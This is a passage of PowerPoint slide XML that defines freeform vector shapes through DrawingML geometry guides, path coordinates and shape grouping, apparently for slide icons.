                  <a:gd name="T90" fmla="*/ 325 w 510"/>
                  <a:gd name="T91" fmla="*/ 573 h 589"/>
                  <a:gd name="T92" fmla="*/ 294 w 510"/>
                  <a:gd name="T93" fmla="*/ 583 h 589"/>
                  <a:gd name="T94" fmla="*/ 220 w 510"/>
                  <a:gd name="T95" fmla="*/ 588 h 589"/>
                  <a:gd name="T96" fmla="*/ 178 w 510"/>
                  <a:gd name="T97" fmla="*/ 578 h 589"/>
                  <a:gd name="T98" fmla="*/ 142 w 510"/>
                  <a:gd name="T99" fmla="*/ 562 h 589"/>
                  <a:gd name="T100" fmla="*/ 53 w 510"/>
                  <a:gd name="T101" fmla="*/ 510 h 589"/>
                  <a:gd name="T102" fmla="*/ 26 w 510"/>
                  <a:gd name="T103" fmla="*/ 484 h 589"/>
                  <a:gd name="T104" fmla="*/ 10 w 510"/>
                  <a:gd name="T105" fmla="*/ 452 h 589"/>
                  <a:gd name="T106" fmla="*/ 0 w 510"/>
                  <a:gd name="T107" fmla="*/ 389 h 589"/>
                  <a:gd name="T108" fmla="*/ 10 w 510"/>
                  <a:gd name="T109" fmla="*/ 352 h 589"/>
                  <a:gd name="T110" fmla="*/ 31 w 510"/>
                  <a:gd name="T111" fmla="*/ 300 h 589"/>
                  <a:gd name="T112" fmla="*/ 142 w 510"/>
                  <a:gd name="T113" fmla="*/ 368 h 5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10" h="589">
                    <a:moveTo>
                      <a:pt x="142" y="368"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="142" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="468"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="400"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="509" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="526"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="583"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="583"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="578"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="562"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="562"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="368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443" name="Group 442"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4685192" y="3983094"/>
            <a:ext cx="1753017" cy="1721694"/>
            <a:chOff x="4682017" y="3979919"/>
            <a:chExt cx="1753017" cy="1721694"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="444" name="Freeform 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4682017" y="3979919"/>
              <a:ext cx="1753017" cy="1466937"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2194 w 7403"/>
                <a:gd name="T1" fmla="*/ 0 h 6195"/>
                <a:gd name="T2" fmla="*/ 2162 w 7403"/>
                <a:gd name="T3" fmla="*/ 215 h 6195"/>
                <a:gd name="T4" fmla="*/ 2121 w 7403"/>
                <a:gd name="T5" fmla="*/ 425 h 6195"/>
                <a:gd name="T6" fmla="*/ 2052 w 7403"/>
                <a:gd name="T7" fmla="*/ 629 h 6195"/>
                <a:gd name="T8" fmla="*/ 1974 w 7403"/>
                <a:gd name="T9" fmla="*/ 819 h 6195"/>
                <a:gd name="T10" fmla="*/ 1874 w 7403"/>
                <a:gd name="T11" fmla="*/ 1008 h 6195"/>
                <a:gd name="T12" fmla="*/ 1764 w 7403"/>
                <a:gd name="T13" fmla="*/ 1181 h 6195"/>
                <a:gd name="T14" fmla="*/ 1637 w 7403"/>
                <a:gd name="T15" fmla="*/ 1343 h 6195"/>
                <a:gd name="T16" fmla="*/ 1496 w 7403"/>
                <a:gd name="T17" fmla="*/ 1496 h 6195"/>
                <a:gd name="T18" fmla="*/ 1343 w 7403"/>
                <a:gd name="T19" fmla="*/ 1637 h 6195"/>
                <a:gd name="T20" fmla="*/ 1181 w 7403"/>
                <a:gd name="T21" fmla="*/ 1764 h 6195"/>
                <a:gd name="T22" fmla="*/ 1008 w 7403"/>
                <a:gd name="T23" fmla="*/ 1874 h 6195"/>
                <a:gd name="T24" fmla="*/ 819 w 7403"/>
                <a:gd name="T25" fmla="*/ 1974 h 6195"/>
                <a:gd name="T26" fmla="*/ 629 w 7403"/>
                <a:gd name="T27" fmla="*/ 2052 h 6195"/>
                <a:gd name="T28" fmla="*/ 425 w 7403"/>
                <a:gd name="T29" fmla="*/ 2121 h 6195"/>
                <a:gd name="T30" fmla="*/ 215 w 7403"/>
                <a:gd name="T31" fmla="*/ 2162 h 6195"/>
                <a:gd name="T32" fmla="*/ 0 w 7403"/>
                <a:gd name="T33" fmla="*/ 2194 h 6195"/>
                <a:gd name="T34" fmla="*/ 0 w 7403"/>
                <a:gd name="T35" fmla="*/ 6194 h 6195"/>
                <a:gd name="T36" fmla="*/ 551 w 7403"/>
                <a:gd name="T37" fmla="*/ 6158 h 6195"/>
                <a:gd name="T38" fmla="*/ 1086 w 7403"/>
                <a:gd name="T39" fmla="*/ 6069 h 6195"/>
                <a:gd name="T40" fmla="*/ 1606 w 7403"/>
                <a:gd name="T41" fmla="*/ 5943 h 6195"/>
                <a:gd name="T42" fmla="*/ 2110 w 7403"/>
                <a:gd name="T43" fmla="*/ 5769 h 6195"/>
                <a:gd name="T44" fmla="*/ 2593 w 7403"/>
                <a:gd name="T45" fmla="*/ 5559 h 6195"/>
                <a:gd name="T46" fmla="*/ 3050 w 7403"/>
                <a:gd name="T47" fmla="*/ 5312 h 6195"/>
                <a:gd name="T48" fmla="*/ 3491 w 7403"/>
                <a:gd name="T49" fmla="*/ 5029 h 6195"/>
                <a:gd name="T50" fmla="*/ 3900 w 7403"/>
                <a:gd name="T51" fmla="*/ 4714 h 6195"/>
                <a:gd name="T52" fmla="*/ 4289 w 7403"/>
                <a:gd name="T53" fmla="*/ 4367 h 6195"/>
                <a:gd name="T54" fmla="*/ 4640 w 7403"/>
                <a:gd name="T55" fmla="*/ 3989 h 6195"/>
                <a:gd name="T56" fmla="*/ 4966 w 7403"/>
                <a:gd name="T57" fmla="*/ 3580 h 6195"/>
                <a:gd name="T58" fmla="*/ 5255 w 7403"/>
                <a:gd name="T59" fmla="*/ 3150 h 6195"/>
                <a:gd name="T60" fmla="*/ 5512 w 7403"/>
                <a:gd name="T61" fmla="*/ 2693 h 6195"/>
                <a:gd name="T62" fmla="*/ 5732 w 7403"/>
                <a:gd name="T63" fmla="*/ 2215 h 6195"/>
                <a:gd name="T64" fmla="*/ 5911 w 7403"/>
                <a:gd name="T65" fmla="*/ 1716 h 6195"/>
                <a:gd name="T66" fmla="*/ 6047 w 7403"/>
                <a:gd name="T67" fmla="*/ 1202 h 6195"/>
                <a:gd name="T68" fmla="*/ 7402 w 7403"/>
                <a:gd name="T69" fmla="*/ 0 h 6195"/>
                <a:gd name="T70" fmla="*/ 3969 w 7403"/>
                <a:gd name="T71" fmla="*/ 3040 h 6195"/>
                <a:gd name="T72" fmla="*/ 3669 w 7403"/>
                <a:gd name="T73" fmla="*/ 4236 h 6195"/>
                <a:gd name="T74" fmla="*/ 3370 w 7403"/>
                <a:gd name="T75" fmla="*/ 3338 h 6195"/>
                <a:gd name="T76" fmla="*/ 3066 w 7403"/>
                <a:gd name="T77" fmla="*/ 4236 h 6195"/>
                <a:gd name="T78" fmla="*/ 2766 w 7403"/>
                <a:gd name="T79" fmla="*/ 3338 h 6195"/>
                <a:gd name="T80" fmla="*/ 2467 w 7403"/>
                <a:gd name="T81" fmla="*/ 4236 h 6195"/>
                <a:gd name="T82" fmla="*/ 2168 w 7403"/>
                <a:gd name="T83" fmla="*/ 3040 h 6195"/>
                <a:gd name="T84" fmla="*/ 1868 w 7403"/>
                <a:gd name="T85" fmla="*/ 1837 h 6195"/>
                <a:gd name="T86" fmla="*/ 2168 w 7403"/>
                <a:gd name="T87" fmla="*/ 1537 h 6195"/>
                <a:gd name="T88" fmla="*/ 3669 w 7403"/>
                <a:gd name="T89" fmla="*/ 1837 h 6195"/>
                <a:gd name="T90" fmla="*/ 3969 w 7403"/>
                <a:gd name="T91" fmla="*/ 3040 h 6195"/>
                <a:gd name="T92" fmla="*/ 6499 w 7403"/>
                <a:gd name="T93" fmla="*/ 598 h 6195"/>
                <a:gd name="T94" fmla="*/ 7202 w 7403"/>
                <a:gd name="T95" fmla="*/ 1002 h 6195"/>
                <a:gd name="T96" fmla="*/ 2168 w 7403"/>
                <a:gd name="T97" fmla="*/ 2435 h 6195"/>
                <a:gd name="T98" fmla="*/ 2766 w 7403"/>
                <a:gd name="T99" fmla="*/ 3040 h 6195"/>
                <a:gd name="T100" fmla="*/ 3066 w 7403"/>
                <a:gd name="T101" fmla="*/ 2435 h 6195"/>
                <a:gd name="T102" fmla="*/ 3669 w 7403"/>
                <a:gd name="T103" fmla="*/ 3040 h 6195"/>
                <a:gd name="T104" fmla="*/ 3066 w 7403"/>
                <a:gd name="T105" fmla="*/ 2435 h 6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403" h="6195">
                  <a:moveTo>
                    <a:pt x="2194" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2194" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2178" y="110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2162" y="215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2141" y="320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2121" y="425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2089" y="525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2052" y="629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2015" y="724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1974" y="819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1926" y="913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1874" y="1008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1821" y="1096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1764" y="1181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1701" y="1265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1637" y="1343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1569" y="1422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1496" y="1496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1422" y="1569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1343" y="1637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1265" y="1701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1181" y="1764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1096" y="1821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1008" y="1874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="913" y="1926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="819" y="1974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724" y="2015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="629" y="2052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525" y="2089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425" y="2121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320" y="2141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215" y="2162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110" y="2178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="6194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="6194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278" y="6184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="551" y="6158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="819" y="6121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1086" y="6069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1349" y="6011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1606" y="5943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1858" y="5864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2110" y="5769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2352" y="5669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2593" y="5559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2824" y="5444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3050" y="5312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275" y="5176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3491" y="5029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3701" y="4877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3900" y="4714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4100" y="4546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4289" y="4367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4467" y="4179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4640" y="3989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4808" y="3785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4966" y="3580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5113" y="3370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5255" y="3150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5391" y="2923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5512" y="2693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5628" y="2456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5732" y="2215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5827" y="1968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5911" y="1716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5985" y="1459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6047" y="1202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7402" y="1202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7402" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2194" y="0"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3969" y="3040"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3669" y="3040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3669" y="4236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3370" y="4236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3370" y="3338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3066" y="3338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3066" y="4236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2766" y="4236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2766" y="3338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2467" y="3338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2467" y="4236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2168" y="4236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2168" y="3040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1868" y="3040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1868" y="1837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2168" y="1837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2168" y="1537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3669" y="1537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3669" y="1837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3969" y="1837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3969" y="3040"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="7202" y="1002"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6499" y="598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7202" y="199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7202" y="1002"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2766" y="2435"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2168" y="2435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2168" y="3040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2766" y="3040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2766" y="2435"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3066" y="2435"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3066" y="3040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3669" y="3040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3669" y="2435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3066" y="243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445" name="Group 444"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4842806" y="4406949"/>
              <a:ext cx="1531671" cy="1294664"/>
              <a:chOff x="5356225" y="4513263"/>
              <a:chExt cx="2328863" cy="1968500"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="446" name="Freeform 53"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5356225" y="6210300"/>
                <a:ext cx="177800" cy="271463"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 225 w 494"/>
                  <a:gd name="T1" fmla="*/ 641 h 752"/>
                  <a:gd name="T2" fmla="*/ 283 w 494"/>
                  <a:gd name="T3" fmla="*/ 651 h 752"/>
                  <a:gd name="T4" fmla="*/ 325 w 494"/>
                  <a:gd name="T5" fmla="*/ 635 h 752"/>
                  <a:gd name="T6" fmla="*/ 346 w 494"/>
                  <a:gd name="T7" fmla="*/ 604 h 752"/>
                  <a:gd name="T8" fmla="*/ 352 w 494"/>
                  <a:gd name="T9" fmla="*/ 567 h 752"/>
                  <a:gd name="T10" fmla="*/ 346 w 494"/>
                  <a:gd name="T11" fmla="*/ 520 h 752"/>
                  <a:gd name="T12" fmla="*/ 325 w 494"/>
                  <a:gd name="T13" fmla="*/ 451 h 752"/>
                  <a:gd name="T14" fmla="*/ 299 w 494"/>
                  <a:gd name="T15" fmla="*/ 420 h 752"/>
                  <a:gd name="T16" fmla="*/ 257 w 494"/>
                  <a:gd name="T17" fmla="*/ 409 h 752"/>
                  <a:gd name="T18" fmla="*/ 168 w 494"/>
                  <a:gd name="T19" fmla="*/ 320 h 752"/>
                  <a:gd name="T20" fmla="*/ 236 w 494"/>
                  <a:gd name="T21" fmla="*/ 310 h 752"/>
                  <a:gd name="T22" fmla="*/ 262 w 494"/>
                  <a:gd name="T23" fmla="*/ 284 h 752"/>
                  <a:gd name="T24" fmla="*/ 278 w 494"/>
                  <a:gd name="T25" fmla="*/ 252 h 752"/>
                  <a:gd name="T26" fmla="*/ 278 w 494"/>
                  <a:gd name="T27" fmla="*/ 184 h 752"/>
                  <a:gd name="T28" fmla="*/ 262 w 494"/>
                  <a:gd name="T29" fmla="*/ 126 h 752"/>
                  <a:gd name="T30" fmla="*/ 242 w 494"/>
                  <a:gd name="T31" fmla="*/ 105 h 752"/>
                  <a:gd name="T32" fmla="*/ 194 w 494"/>
                  <a:gd name="T33" fmla="*/ 100 h 752"/>
                  <a:gd name="T34" fmla="*/ 157 w 494"/>
                  <a:gd name="T35" fmla="*/ 115 h 752"/>
                  <a:gd name="T36" fmla="*/ 136 w 494"/>
                  <a:gd name="T37" fmla="*/ 142 h 752"/>
                  <a:gd name="T38" fmla="*/ 131 w 494"/>
                  <a:gd name="T39" fmla="*/ 184 h 752"/>
                  <a:gd name="T40" fmla="*/ 5 w 494"/>
                  <a:gd name="T41" fmla="*/ 252 h 752"/>
                  <a:gd name="T42" fmla="*/ 10 w 494"/>
                  <a:gd name="T43" fmla="*/ 115 h 752"/>
